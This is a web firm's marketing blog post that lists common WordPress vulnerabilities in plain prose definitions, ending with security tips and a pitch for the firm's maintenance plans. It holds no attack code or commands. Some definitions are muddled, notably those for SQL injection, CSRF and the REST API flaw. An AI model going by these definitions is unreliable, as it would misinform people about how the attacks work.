Common WordPress Vulnerabilities & Security Best Practices

WordPress is free open-source software used to manage content for websites and blogs. WordPress powers 43% of all websites on the internet, making it the most widely used content management system (CMS) on the planet. And it’s showing no sign of slowing down. WordPress has been increasing in usage every year for more than a decade now. But how did WordPress get so popular?

You don’t become the world’s favourite CMS by being complicated and finicky. WordPress is well-known for it’s easy to use interface. There are plenty of tutorials, and the customization available in WordPress is super easy to access and get the hang of. Plus, there are thousands of free templates to pick from, and you don’t need to be a professional programmer to build your own from scratch.

Like anything hosted on the web these days, WordPress is vulnerable to cybercriminals, bugs and other security risks. Despite being one of the more secure CMS platforms, nobody is perfect. Plus, being such widely used software, WordPress has become a prime target for hackers in the past couple decades.

selling products online

If a cybercriminal does happen to gain entry to your site, there’s a lot that can go wrong. Your site could be prone to long periods of downtime, which will hurt your traffic, but your private data could also be exposed (which includes your website visitors’ data). This kind of data leak will not only hurt your site, but the reputation of your brand as well.


Common WordPress Vulnerabilities

WordPress vulnerabilities detected

Image credit to iThemes

In this article, we’ll outline some of the most common WordPress vulnerabilities your website could be exposed to. But first, to get an idea what your site is being exposed to, sign up for the WordPress Vulnerability Report from iThemes.

In this report, you’ll see that WordPress vulnerabilities are placed into one of three categories: WordPress Core, Themes or Plugins. ‘Core’ is the stock version of WordPress, and includes all the foundational files that the CMS requires to function. ‘Themes’ are groups of files that tell WordPress how a site should look – there are thousands to choose from. ‘Plugins’ are a piece of software that you can add to your website to improve functionality. If you have a big collection of plugins, you may notice they’re the source of most WordPress vulnerabilities.

man on computer in the dark

Let’s dive in:

  • Cross-site Scripting: Also known as XSS, cross-site scripting are injections in otherwise trusted websites that contain malicious scripts. An XSS attack happens when a cybercriminal uses a web application to send malicious code to an end user.
  • Outdated Plugins: When a developer stops working on a plugin or releases new features while neglecting the old version, plugins can become outdated. This can be risky for websites, as the plugin will either stop working or become more accessible to hackers.
  • Cross-site Forgery Request: Cross-site request forgery (CSRF) is a type of attack that causes end users to unknowingly execute actions on a web application they have access to. By going through the authentication process for hackers, they’ll be able to implement change requests like transferring funds and changing a login email address.
  • SQL Injection: SQL injection is a common web-hacking technique that can attack your database. When asked for an input like a username or email address, the user will get an SQL statement that you will then run on your database unknowingly.
  • Bypasses: Cybercriminals use bypasses to skip over login screens and gain access to your WordPress account. It works be resetting a user’s login credentials in order to gain unauthorized access.
  • RCE Vulnerabilities: Remote Code Execution (RCE) is a method of attack where someone can take over control of someone’s device. Through this kind of attack, an entire web application or web server can be compromised.
  • PHP Vulnerabilities: PHP vulnerabilities is an umbrella term used to describe XSS, CSRF, SQL injection and other attacks. This application level vulnerability allows the attacker to perform a broad range of malicious attacks on website that use PHP programming language.

different types of WordPress vulnerabilities

Image credit to iThemes

  • DDoS Attacks: A distributed denial of service (DDoS) is a type of cyber attack where devices are used to send or request data from a WordPress website hosting server, with the aim of slowing or crashing the server.
  • REST API: A REST API vulnerability is when an attacker is able to gain unauthorized access to edit the content of a post of page. It’s done by sending a HTTP GET request that is easily understood by REST API.
  • Weak Passwords: Weak passwords are a common vulnerability that can allow hackers to do a lot of damage. If your passwords aren’t updated regularly or are easy to guess, cybercriminals will have an easier time accessing your site.
  • Sensitive Info Disclosure: Sensitive information disclosure happens when a website unknowingly reveals sensitive information to its users, such as private user data, financial info and login info.
  • Malware: Malware is a blanket term used to describe a range of vulnerabilities. Malware can steal, encrypt and delete sensitive data, or hijack certain functions of your website, and can include viruses, worms, ransomware and spyware.
  • Phishing: Phishing is a type of attack that is aimed at stealing your money, identity, login credentials or other information. Cybercriminals commonly use deceptive techniques to phish information from users through emails and text messages.
  • Hypertext Transfer Protocol: HTTP protocol in an unencrypted application layer internet protocol developed in 1989 that is unsecure. The secure variant is known as HTTPS, which is used by most reputable websites.


How Caorda Can Protect Your Site

cybersecurity graphic

Far more than just building websites, Caorda specializes in the hosting, maintenance and support of websites as well. Our experienced team of web developers and technical support staff are ready to protect and maintain the security of your website, fixing bugs and implementing preventative maintenance strategies. It’s what we do.

Tips for securing your WordPress site:

  • Install and configure a security plugin
    We recommend iThemes Security and Sucuri.  These can be run together to provide the best coverage.
  • Lock your site files
    Customers on our monthly maintenance plan benefit from having their site files locked at the server level.  This means that even if a hacker gets into your site, they are unable to upload or delete any core files.  This is an extra safeguard to protect your site.
  • Keep your site up to date
    Our maintenance plan customers benefit from monthly core, theme and plugin updates on their site as well as a fast response to any reported vulnerability.  We’ll get you patched up and on your way.  If there’s no known fix for the issue, we’ll recommend a replacement and help get your site back up and running, safely.

If you don’t have resources to monitor for vulnerabilities and perform regular updates on your WordPress website, reach out to Caorda. We offer Support & Maintenance plans to keep your WordPress site secure. Contact us today for a consultation:

Get in touch today!